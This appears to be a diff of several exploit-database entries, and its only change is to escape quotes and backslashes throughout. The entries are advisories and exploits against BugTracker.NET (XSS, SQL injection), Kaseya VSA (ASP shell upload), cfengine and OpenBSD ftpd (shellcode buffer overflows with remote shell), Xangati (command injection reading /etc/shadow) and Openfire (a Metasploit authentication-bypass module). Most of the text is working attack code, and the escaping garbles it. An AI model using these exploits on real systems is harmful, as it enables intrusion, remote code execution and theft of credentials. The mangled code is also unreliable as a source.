@ -68,7 +68,7 @@ and Alejandro Frydman from Core Security Technologies.
 [CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in
 similar ways. The following proof of concept shows how to exploit the
-XSS founded in 'edit_comment.aspx':
+XSS founded in \'edit_comment.aspx\':
 /-----
 ...   
@ -76,9 +76,9 @@ XSS founded in 'edit_comment.aspx':
 231 <table border=0><tr><td>
 232
 233 <a href=edit_bug.aspx?id=<%
-Response.Write(Request["bug_id"]);%>>back to <%
+Response.Write(Request[\"bug_id\"]);%>>back to <%
-Response.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %></a>
+Response.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a>
-234 <form class=frm runat="server">
+234 <form class=frm runat=\"server\">
 235
 236    <table border=0>
 ...
@ -89,30 +89,30 @@ bug. Then, edit it using this URL:
 /-----
 http://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
 -----/
- As a result, the JavaScript code injected into the parameter 'bug_id'
+ As a result, the JavaScript code injected into the parameter \'bug_id\'
 will be rendered without sanitization in the line 233, and executed in
-the context of the client's web browser.
+the context of the client\'s web browser.
 7.2. *SQL Injection Vulnerabilities*
 [CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be
 exploited in similar ways. Consider, for example, the code located in
-'delete_query.aspx':
+\'delete_query.aspx\':
 /-----
 ...
 26 if (IsPostBack)
 27 {
 28     // do delete here
-29     sql = @"delete queries where qu_id = $1";
+29     sql = @\"delete queries where qu_id = $1\";
-30     sql = sql.Replace("$1", row_id.Value);
+30     sql = sql.Replace(\"$1\", row_id.Value);
 31     btnet.DbUtil.execute_nonquery(sql);
-32     Server.Transfer ("queries.aspx");
+32     Server.Transfer (\"queries.aspx\");
 33 }
 ...
 -----/
- In line 30, the value of 'row_id' is injected without sanitization into
+ In line 30, the value of \'row_id\' is injected without sanitization into
 the SQL query. This value arrives to the server in a hidden field of a
 client request. As a result, a malicious user can manipulate this value
 in order to execute code in the database layer of the application.
@ -170,7 +170,7 @@ project information and shared software tools for public use at:
 Core Security Technologies develops strategic solutions that help
 security-conscious organizations worldwide develop and maintain a
-proactive process for securing their networks. The company's flagship
+proactive process for securing their networks. The company\'s flagship
 product, CORE IMPACT, is the most comprehensive product for performing
 enterprise security assurance testing. CORE IMPACT evaluates network,
 endpoint and end-user vulnerabilities and identifies what resources are
--- a/platforms/asp/webapps/38351.txt
+++ b/platforms/asp/webapps/38351.txt
@ -1,7 +1,7 @@
 Kaseya VSA is an IT management platform for small and medium corporates.
 From its console you can control thousands of computers and mobile
 devices. So that if you own the Kaseya server, you own the organisation.
-With this post I'm also releasing two Metasploit modules ([E1], [E2])
+With this post I\'m also releasing two Metasploit modules ([E1], [E2])
 and a Ruby file ([E3]) that exploit the vulnerabilities described below.
 A special thanks to ZDI for assisting with the disclosure of these
@ -28,12 +28,12 @@ Security (http://www.agileinfosec.co.uk/)
 Disclosure: 23/09/2015 / Last updated: 28/09/2015
 >> Background on the affected product:
-"Kaseya VSA is an integrated IT Systems Management platform that can be
+\"Kaseya VSA is an integrated IT Systems Management platform that can be
 leveraged seamlessly across IT disciplines to streamline and automate
 your IT services. Kaseya VSA integrates key management capabilities into
 a single platform. Kaseya VSA makes your IT staff more productive, your
 services more reliable, your systems more secure, and your value easier
-to show."
+to show.\"
 A special thanks to ZDI for assisting with the vulnerability reporting
 process.
@ -52,7 +52,7 @@ VSA Version 9.0.0.0 â?? 9.0.0.18
 VSA Version 9.1.0.0 â?? 9.1.0.8
 GET /LocalAuth/setAccount.aspx
-Page will attempt to redirect, ignore this and obtain the "sessionVal"
+Page will attempt to redirect, ignore this and obtain the \"sessionVal\"
 value from the page which will be used in the following POST request.
 POST /LocalAuth/setAccount.aspx
@ -85,7 +85,7 @@ Cookie: sessionId=<sessionID>
 <... ASP shell here...>
 The path needs to be correct, but Kaseya is helpful enough to let us
-know when a path doesn't exist.
+know when a path doesn\'t exist.
 A Metasploit module that exploits this vulnerability has been released.
 #3
@ -108,20 +108,20 @@ boundary=---------------------------114052411119142
 Content-Length: 1501
 -----------------------------114052411119142
-Content-Disposition: form-data; name="directory"
+Content-Disposition: form-data; name=\"directory\"
 ../WebPages
 -----------------------------114052411119142
-Content-Disposition: form-data; name="ReferringWebWindowId"
+Content-Disposition: form-data; name=\"ReferringWebWindowId\"
 31a5d16a-01b7-4f8d-adca-0b2e70006dfa
 -----------------------------114052411119142
-Content-Disposition: form-data; name="request"
+Content-Disposition: form-data; name=\"request\"
 uploadFile
 -----------------------------114052411119142
-Content-Disposition: form-data; name="impinf__uploadfilelocation";
+Content-Disposition: form-data; name=\"impinf__uploadfilelocation\";
-filename="shell.asp"
+filename=\"shell.asp\"
 Content-Type: application/octet-stream
 <... ASP shell here...>
--- a/platforms/bsd/remote/105.pl
+++ b/platforms/bsd/remote/105.pl
@ -5,37 +5,37 @@
 use IO::Socket;
 if(!$ARGV[1])
-{ print "usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\n"; exit(-1); }
+{ print \"usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\\n\"; exit(-1); }
 $host = $ARGV[0];
 $port = $ARGV[1];
-$nop = "\x90";
+$nop = \"\\x90\";
-$ret = pack("l",0xbfafe3dc);
+$ret = pack(\"l\",0xbfafe3dc);
 $shellcode = 
-"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0".
+\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\".
-"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02".
+\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\".
-"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80".
+\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\".
-"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57".
+\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\".
-"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89".
+\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\".
-"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50".
+\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\".
-"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80".
+\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\".
-"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56".
+\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\".
-"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd".
+\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\".
-"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f".
+\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\".
-"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b".
+\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\".
-"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80".
+\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\".
-"\xeb\x9a";
+\"\\xeb\\x9a\";
 $buf = $nop x 2222 . $shellcode . $ret x 500;
 $socket = new IO::Socket::INET ( 
-Proto  => "tcp",
+Proto  => \"tcp\",
 PeerAddr => $host,
 PeerPort => $port, 
 );
-die "unable to connect to $host:$port ($!)\n" unless $socket;
+die \"unable to connect to $host:$port ($!)\\n\" unless $socket;
 sleep(1); #you might have to adjust this on slow connections
 print $socket $buf;
--- a/platforms/bsd/remote/234.c
+++ b/platforms/bsd/remote/234.c
@ -40,22 +40,22 @@ int verbose = 0;
 /*
-   Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask
+   Written by dvorak, garbled up by \"Smegma\" with a word xor 0xaabb mask
   to get rid of dots and slashes.
 */
 char heavenlycode[] =
-"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\xcd\x80"
+\"\\x31\\xc0\\x89\\xc1\\x80\\xc1\\x02\\x51\\x50\\x04\\x5a\\x50\\xcd\\x80\"
-"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff\xff\x50\xcf\xe5\x9b\x7b\xf
+\"\\xeb\\x10\\x5e\\x31\\xc9\\xb1\\x4a\\x66\\x81\\x36\\xbb\\xaa\\x46\\x46\\xe2\\xf7\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\xff\\xff\\xff\\x50\\xcf\\xe5\\x9b\\x7b\\xf
-a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa5\xf9\xbf\xaf\xeb\x67\x3b\x2
+a\\xbf\\xbd\\xeb\\x67\\x3b\\xfc\\x8a\\x6a\\x33\\xec\\xba\\xae\\x33\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\xb5\\x36\\xf4\\xa5\\xf9\\xbf\\xaf\\xeb\\x67\\x3b\\x2
-3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xbf\xa6\xeb\x67\x3b\x27\xe5\xb
+3\\x7a\\xfc\\x8a\\x6a\\xbf\\x97\\xeb\\x67\\x3b\\xfb\\x8a\\x6a\\xbf\\xa4\\xf3\\xfa\\x76\\x2a\\x36\\xf4\\xb9\\xf9\\x8a\\x6a\\xbf\\xa6\\xeb\\x67\\x3b\\x27\\xe5\\xb
-4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x32\xec\x97\xf9\xbf\x91\xeb\x6
+4\\xe8\\x9b\\x7b\\xae\\x86\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\x8d\\x36\\xf4\\x93\\xf9\\x36\\xf4\\x9b\\x23\\xe5\\x82\\x32\\xec\\x97\\xf9\\xbf\\x91\\xeb\\x6
-7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x8
+7\\x3b\\x42\\x2d\\x55\\x44\\x55\\xfa\\xeb\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x8
-5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\xd3";
+5\\x95\\x84\\x94\\x84\\x95\\xeb\\x94\\xc8\\xd2\\xc4\\x94\\xd9\\xd3\";
-char user[255] = "anonymous";
+char user[255] = \"anonymous\";
-char pass[255] = "anonymous@abc.com";
+char pass[255] = \"anonymous@abc.com\";
-char write_dir[PATH_MAX] = "/";
+char write_dir[PATH_MAX] = \"/\";
 int ftpport = 21;
 unsigned long int ret_addr = 0;
 #define CMD_LOCAL 0
@ -70,24 +70,24 @@ struct typeT {
 #define NUM_TYPES 2
 struct typeT types[NUM_TYPES] = {
-        "OpenBSD 2.6", 0xdfbfd0ac,
+        \"OpenBSD 2.6\", 0xdfbfd0ac,
-        "OpenBSD 2.7", 0xdfbfd0ac};
+        \"OpenBSD 2.7\", 0xdfbfd0ac};
 void
 usage(char *program)
 {
        int i;
        fprintf(stderr,
-                "\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command] 
+                \"\\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\\n\\t\\t[-r retaddr] [-c command] 
-[-C command]\n\n"
+[-C command]\\n\\n\"
-                "Directory should be an absolute path, writable by the user.\n"
+                \"Directory should be an absolute path, writable by the user.\\n\"
-                "The argument of -c will be executed on the remote host\n"
+                \"The argument of -c will be executed on the remote host\\n\"
-                "while the argument of -C will be executed on the local\n"
+                \"while the argument of -C will be executed on the local\\n\"
-                "with its filedescriptors connected to the remote host\n"
+                \"with its filedescriptors connected to the remote host\\n\"
-                "Valid types:\n",
+                \"Valid types:\\n\",
                program);
        for (i = 0; i < NUM_TYPES; i++) {
-                printf("%d : %s\n", i,  types[i].name);
+                printf(\"%d : %s\\n\", i,  types[i].name);
        }
        exit(-1);
 }
@ -98,54 +98,54 @@ main(int argc, char **argv)
        unsigned int i;
        int opt, fd;
        unsigned int type = 0;
-        char *hostname = "localhost";
+        char *hostname = \"localhost\";
        if (argc < 2)
                usage(argv[0]);
-        while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) {
+        while ((opt = getopt(argc, argv, \"h:r:u:f:d:t:vp:c:C:\")) != -1) {
                switch (opt) {
-                case 'h':
+                case \'h\':
                        hostname = optarg;
                        break;
-                case 'C':
+                case \'C\':
                        command = optarg;
                        command_type = CMD_LOCAL;
                        break;
-                case 'c':
+                case \'c\':
                        command = optarg;
                        command_type = CMD_REMOTE;
                        break;
-                case 'r':
+                case \'r\':
                        ret_addr = strtoul(optarg, NULL, 0);
                        break;
-                case 'v':
+                case \'v\':
                        verbose++;
                        break;
-                case 'f':
+                case \'f\':
                        if (!(ftpport = atoi(optarg))) {
-                                fprintf(stderr, "Invalid destination port - %s\n", optarg);
+                                fprintf(stderr, \"Invalid destination port - %s\\n\", optarg);
                                exit(-1);
                        }
                        exit(-1);
                        break;
-                case 'u':
+                case \'u\':
                        strncpy(user, optarg, sizeof(user) - 1);
                        user[sizeof(user) - 1] = 0x00;
                        break;
-                case 'p':
+                case \'p\':
                        strncpy(pass, optarg, sizeof(pass) - 1);
                        pass[sizeof(pass) - 1] = 0x00;
                        break;
-                case 'd':
+                case \'d\':
                        strncpy(write_dir, optarg, sizeof(write_dir) - 1);
                        write_dir[sizeof(write_dir) - 1] = 0x00;
-                        if ((write_dir[0] != '/')) 
+                        if ((write_dir[0] != \'/\')) 
                                usage(argv[0]);
-                        if ((write_dir[strlen(write_dir) - 1] != '/'))
+                        if ((write_dir[strlen(write_dir) - 1] != \'/\'))
-                                strncat(write_dir, "/", sizeof(write_dir) - 1);
+                                strncat(write_dir, \"/\", sizeof(write_dir) - 1);
                        break;
-                case 't':
+                case \'t\':
                        type = atoi(optarg);
                        if (type > NUM_TYPES)
                                usage(argv[0]);
@ -160,7 +160,7 @@ main(int argc, char **argv)
        if ((fd = xconnect(hostname, ftpport)) == -1)
                exit(-1);
        else
-                printf("Connected to remote host! Sending evil codes.\n");
+                printf(\"Connected to remote host! Sending evil codes.\\n\");
        ftp_login(fd, user, pass);
@ -178,19 +178,19 @@ ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg)
        if (res == NULL)
                return 0;
        if (verbose)
-                printf("%s\n", res);
+                printf(\"%s\\n\", res);
-        if (msg && (res[0] != '2')) {
+        if (msg && (res[0] != \'2\')) {
-                fprintf(stderr, "%s\n", msg);
+                fprintf(stderr, \"%s\\n\", msg);
                exit(-1);
        }
-        return (res[0] != '2');
+        return (res[0] != \'2\');
 }
 void shell(int fd)
 {
        fd_set readfds;
        char buf[1];
-        char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n";
+        char *tst = \"echo ; echo ; echo HAVE FUN ; id ; uname -a\\n\";
        write(fd, tst, strlen(tst));
        while (1) {
@ -200,14 +200,14 @@ void shell(int fd)
                select(fd + 1, &readfds, NULL, NULL, NULL);
                if (FD_ISSET(0, &readfds)) {
                        if (read(0, buf, 1) != 1) {
-                                perror("read");
+                                perror(\"read\");
                                exit(1);
                        }
                        write(fd, buf, 1);
                }
                if (FD_ISSET(fd, &readfds)) {
                        if (read(fd, buf, 1) != 1) {
-                                perror("read");
+                                perror(\"read\");
                                exit(1);
                        }
                        write(1, buf, 1);
@ -228,7 +228,7 @@ void do_command(int fd)
                exit (2);
        }
        write(fd, command, strlen(command));
-        write(fd, "\n", 1);
+        write(fd, \"\\n\", 1);
        while ((len = read(fd, buffer, sizeof(buffer))) > 0) {
                write(1, buffer, len);
        }
@ -242,10 +242,10 @@ void execute_command(fd)
 int exploit_ok(int fd)
 {
        char result[1024];
-        xsend(fd, "id\n");
+        xsend(fd, \"id\\n\");
        xrecieve(fd, result, sizeof(result));
-        return (strstr(result, "uid=") != NULL);
+        return (strstr(result, \"uid=\") != NULL);
 }
 void exploit(int fd)
@ -254,49 +254,49 @@ void exploit(int fd)
        int heavenlycode_s;
        char *dir = NULL;
-        ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");
+        ftp_cmd_err(fd, \"CWD\", write_dir, res, 1024, \"Can\'t CWD to write_dir\");
-        dir = strcreat(dir, "A", 255 - strlen(write_dir));
+        dir = strcreat(dir, \"A\", 255 - strlen(write_dir));
-        ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
+        ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
-        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
+        ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
        xfree(&dir);
        /* next on = 256 */
-        dir = strcreat(dir, "A", 255);
+        dir = strcreat(dir, \"A\", 255);
-        ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
+        ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
-        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
+        ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
        xfree(&dir);
        /* next on = 512 */
        heavenlycode_s = strlen(heavenlycode);
-        dir = strcreat(dir, "A", 254 - heavenlycode_s);
+        dir = strcreat(dir, \"A\", 254 - heavenlycode_s);
        dir = strcreat(dir, heavenlycode, 1);
-        ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
+        ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
-        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
+        ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
        xfree(&dir);
        /* next on = 768 */
        dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
-        ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
+        ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
-        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
+        ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
        xfree(&dir);
        /* length = 1020 */
-        /* 1022 moet " zijn */
+        /* 1022 moet \" zijn */
-        dir = strcreat(dir, "AAA\"", 1);
+        dir = strcreat(dir, \"AAA\\\"\", 1);
-        ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
+        ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
-        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
+        ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
        xfree(&dir);
        /* and tell it to blow up */
-        ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL);
+        ftp_cmd_err(fd, \"PWD\", NULL, res, 1024, NULL);
        if (!exploit_ok(fd)) {
                if (command != NULL) {
                        exit (2);
                } 
-                fprintf(stderr, "Exploit failed\n");
+                fprintf(stderr, \"Exploit failed\\n\");
                exit (1);
        }
        if (command == NULL)
@ -346,7 +346,7 @@ xrealloc(void *ptr, size_t size)
        char *wittgenstein_was_a_drunken_swine;
        if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) {
-                fprintf(stderr, "Cannot calculate universe\n");
+                fprintf(stderr, \"Cannot calculate universe\\n\");
                exit(-1);
        }
        return (wittgenstein_was_a_drunken_swine);
@ -367,7 +367,7 @@ xmalloc(size_t size)
        char *heidegger_was_a_boozy_beggar;
        if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) {
-                fprintf(stderr, "Out of cheese error\n");
+                fprintf(stderr, \"Out of cheese error\\n\");
                exit(-1);
        }
        return (heidegger_was_a_boozy_beggar);
@ -382,7 +382,7 @@ xconnect(char *host, u_short port)
        int fd;
        if ((he = gethostbyname(host)) == NULL) {
-                perror("gethostbyname");
+                perror(\"gethostbyname\");
                return (-1);
        }
        memset(&s_in, 0, sizeof(s_in));
@ -391,11 +391,11 @@ xconnect(char *host, u_short port)
        memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
        if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
-                perror("socket");
+                perror(\"socket\");
                return (-1);
        }
        if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) {
-                perror("connect");
+                perror(\"connect\");
                return (-1);
        }
        return fd;
@ -409,20 +409,20 @@ ftp_login(int fd, char *user, char *password)
        int rep;
        xrecieveall(fd, reply, sizeof(reply));
        if (verbose) {
-                printf("Logging in ..\n");
+                printf(\"Logging in ..\\n\");
-                printf("%s\n", reply);
+                printf(\"%s\\n\", reply);
        }
-        xsendftpcmd(fd, "USER", user);
+        xsendftpcmd(fd, \"USER\", user);
        xrecieveall(fd, reply, sizeof(reply));
        if (verbose)
-                printf("%s\n", reply);
+                printf(\"%s\\n\", reply);
-        xsendftpcmd(fd, "PASS", password);
+        xsendftpcmd(fd, \"PASS\", password);
        xrecieveall(fd, reply, sizeof(reply));
        if (verbose)
-                printf("%s\n", reply);
+                printf(\"%s\\n\", reply);
-        if (reply[0] != '2') {
+        if (reply[0] != \'2\') {
-                printf("Login failed.\n");
+                printf(\"Login failed.\\n\");
                exit(-1);
        }
 }
@ -433,10 +433,10 @@ xsendftpcmd(int fd, char *command, char *param)
        xsend(fd, command);
        if (param != NULL) {
-                xsend(fd, " ");
+                xsend(fd, \" \");
                xsend(fd, param);
        }
-        xsend(fd, "\r\n");
+        xsend(fd, \"\\r\\n\");
 }
@ -445,7 +445,7 @@ xsend(int fd, char *buf)
 {
        if (send(fd, buf, strlen(buf), 0) != strlen(buf)) {
-                perror("send");
+                perror(\"send\");
                exit(-1);
        }
 }
@ -462,7 +462,7 @@ xrecieveall(int fd, char *buf, int size)
        memset(buf, 0, size);
        do {
                xrecieve(fd, buf, size);
-        } while (buf[3] == '-');
+        } while (buf[3] == \'-\');
 }
 /* recieves a line from the ftpd */
 void
@ -475,25 +475,25 @@ xrecieve(int fd, char *buf, int size)
        while (buf < end) {
                if (read(fd, buf, 1) != 1) {
-                        perror("read"); /* XXX */
+                        perror(\"read\"); /* XXX */
                        exit(-1);
                }
-                if (buf[0] == '\n') {
+                if (buf[0] == \'\\n\') {
-                        buf[0] = '\0';
+                        buf[0] = \'\\0\';
                        return;
                }
-                if (buf[0] != '\r') {
+                if (buf[0] != \'\\r\') {
                        buf++;
                }
        }
        buf--;
        while (read(fd, buf, 1) == 1) {
-                if (buf[0] == '\n') {
+                if (buf[0] == \'\\n\') {
-                        buf[0] = '\0';
+                        buf[0] = \'\\0\';
                        return;
                }
        }
-        perror("read");         /* XXX */
+        perror(\"read\");         /* XXX */
        exit(-1);
 }
--- a/platforms/cgi/webapps/39145.txt
+++ b/platforms/cgi/webapps/39145.txt
@ -6,7 +6,7 @@ An attacker may leverage this issue to execute arbitrary commands in the context
 Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
-curl -i -s -k  -X 'POST' \
+curl -i -s -k  -X \'POST\' \\
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+-H \'Content-Type: application/x-www-form-urlencoded\' -H \'User-Agent: Java/1.7.0_25\' \\
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
+--data-binary $\'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\\\'cat\\\\x20/etc/shadow\\\';$CMD;+YES\' \\
-'hxxps://www.example.com/servlet/Installer'
+\'hxxps://www.example.com/servlet/Installer\'
--- a/platforms/jsp/webapps/19432.rb
+++ b/platforms/jsp/webapps/19432.rb
@ -5,8 +5,8 @@
 #   http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
-require 'rex/zip'
+require \'rex/zip\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'        => 'Openfire Admin Console Authentication Bypass',
+			\'Name\'        => \'Openfire Admin Console Authentication Bypass\',
-			'Description' => %q{
+			\'Description\' => %q{
 					This module exploits an authentication bypass vulnerability in the administration
 				console of Openfire servers. By using this vulnerability it is possible to
 				upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
@ -29,102 +29,102 @@ class Metasploit3 < Msf::Exploit::Remote
 				the server in some kind of unstable state, making re-exploitation difficult. You might
 				want to do this manually.
 			},
-			'Author'      =>
+			\'Author\'      =>
 				[
-					'Andreas Kurtz', # Vulnerability discovery
+					\'Andreas Kurtz\', # Vulnerability discovery
-					'h0ng10'         # Metasploit module
+					\'h0ng10\'         # Metasploit module
 				],
-			'License'     => MSF_LICENSE,
+			\'License\'     => MSF_LICENSE,
-			'References'  =>
+			\'References\'  =>
 				[
-					[ 'CVE', '2008-6508' ],
+					[ \'CVE\', \'2008-6508\' ],
-					[ 'OSVDB', '49663' ],
+					[ \'OSVDB\', \'49663\' ],
-					[ 'BID', '32189' ],
+					[ \'BID\', \'32189\' ],
-					[ 'EDB', '7075' ],
+					[ \'EDB\', \'7075\' ],
-					[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
+					[ \'URL\', \'http://community.igniterealtime.org/thread/35874\' ]
 				],
-			'DisclosureDate' => 'Nov 10 2008',
+			\'DisclosureDate\' => \'Nov 10 2008\',
-			'Privileged'  => true,
+			\'Privileged\'  => true,
-			'Platform'    => ['java', 'win', 'linux' ],
+			\'Platform\'    => [\'java\', \'win\', \'linux\' ],
-			'Stance'      => Msf::Exploit::Stance::Aggressive,
+			\'Stance\'      => Msf::Exploit::Stance::Aggressive,
-			'Targets'     =>
+			\'Targets\'     =>
 				[
 					#
 					# Java version
 					#
-					[ 'Java Universal',
+					[ \'Java Universal\',
 						{
-								'Arch' => ARCH_JAVA,
+								\'Arch\' => ARCH_JAVA,
-								'Platform' => 'java'
+								\'Platform\' => \'java\'
 						}
 					],
 					#
 					# Platform specific targets
 					#
-					[ 'Windows x86 (Native Payload)',
+					[ \'Windows x86 (Native Payload)\',
 						{
-							'Platform' => 'win',
+							\'Platform\' => \'win\',
-							'Arch' => ARCH_X86,
+							\'Arch\' => ARCH_X86,
 						}
 					],
-					[ 'Linux x86 (Native Payload)',
+					[ \'Linux x86 (Native Payload)\',
 						{
-							'Platform' => 'linux',
+							\'Platform\' => \'linux\',
-							'Arch' => ARCH_X86,
+							\'Arch\' => ARCH_X86,
 						}
 					]
 				],
-			'DefaultTarget'   => 0,
+			\'DefaultTarget\'   => 0,
 		))
 		register_options(
 			[
 				Opt::RPORT(9090),
-				OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+				OptString.new(\'TARGETURI\', [true, \'The base path to the web application\', \'/\']),
-				OptString.new('PLUGINNAME',  [ false, 'Openfire plugin base name, (default: random)' ]),
+				OptString.new(\'PLUGINNAME\',  [ false, \'Openfire plugin base name, (default: random)\' ]),
-				OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
+				OptString.new(\'PLUGINAUTHOR\',[ false, \'Openfire plugin author, (default: random)\' ]),
-				OptString.new('PLUGINDESC',  [ false, 'Openfire plugin description, (default: random)' ]),
+				OptString.new(\'PLUGINDESC\',  [ false, \'Openfire plugin description, (default: random)\' ]),
-				OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
